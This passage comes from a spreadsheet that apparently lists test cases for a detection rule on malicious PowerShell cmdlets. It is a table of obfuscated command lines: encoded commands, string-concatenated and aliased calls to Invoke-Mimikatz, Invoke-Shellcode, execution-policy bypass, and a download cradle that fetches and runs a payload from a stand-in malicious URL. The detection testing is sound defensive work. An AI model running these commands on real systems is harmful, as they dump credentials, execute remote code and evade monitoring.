          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C160" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D160" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E160" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="36" t="n"/>
      <c r="J160" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B161" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C161" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D161" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E161" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="36" t="n"/>
      <c r="J161" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B162" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C162" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D162" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E162" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="36" t="n"/>
      <c r="J162" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B163" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C163" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D163" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E163" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="36" t="n"/>
      <c r="J163" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B164" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C164" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D164" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E164" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="36" t="n"/>
      <c r="J164" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B165" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C165" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D165" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E165" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B166" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C166" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D166" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E166" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B167" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C167" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D167" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E167" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C168" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D168" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E168" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="43" t="n"/>
      <c r="J168" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C169" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D169" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E169" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="n"/>
      <c r="J169" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="n"/>
      <c r="B170" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C170" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D170" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E170" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="43" t="n"/>
      <c r="J170" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="n"/>
      <c r="B171" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C171" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D171" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E171" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H171" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="43" t="n"/>
      <c r="J171" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="n"/>
      <c r="B172" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C172" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D172" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E172" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="36" t="n"/>
      <c r="J172" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="n"/>
      <c r="B173" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C173" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D173" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E173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173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="36" t="n"/>
      <c r="J173" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="n"/>
      <c r="B174" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C174" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D174" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E174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174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="36" t="n"/>
      <c r="J174" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="n"/>
      <c r="B175" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C175" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D175" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E175" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="36" t="n"/>
      <c r="J175" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="n"/>
      <c r="B176" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C176" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D176" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E176" s="36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176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H176" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="36" t="n"/>
      <c r="J176" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="n"/>
      <c r="B177" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C177" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D177" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E177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177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="36" t="n"/>
      <c r="J177" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="n"/>
      <c r="B178" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C178" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D178" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E178" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noproFiLE /"NonInteractive" -ep Bypass -CoMmaND "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="36" t="n"/>
      <c r="J178" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="n"/>
      <c r="B179" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C179" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D179" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E179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179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="36" t="n"/>
      <c r="J179" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C180" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D180" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E180" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="36" t="n"/>
      <c r="J180" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="n"/>
      <c r="B181" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C181" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D181" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E181" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="36" t="n"/>
      <c r="J181" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K181" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="n"/>
      <c r="B182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C182" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D182" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E182" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K182" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="n"/>
      <c r="B183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C183" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D183" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E183" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K183" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="n"/>
      <c r="B184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C184" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D184" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E184" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="n"/>
      <c r="J184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="n"/>
      <c r="B185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C185" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D185" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E185" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="n"/>
      <c r="J185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="n"/>
      <c r="B186" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C186" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D186" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E186" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="43" t="n"/>
      <c r="J186" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="n"/>
      <c r="B187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C187" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D187" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E187" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="36" t="n"/>
      <c r="J187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C188" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D188" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E188" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H188" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I188" s="36" t="n"/>
      <c r="J188" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C189" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D189" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E189" s="36" t="inlineStr">
        <is>
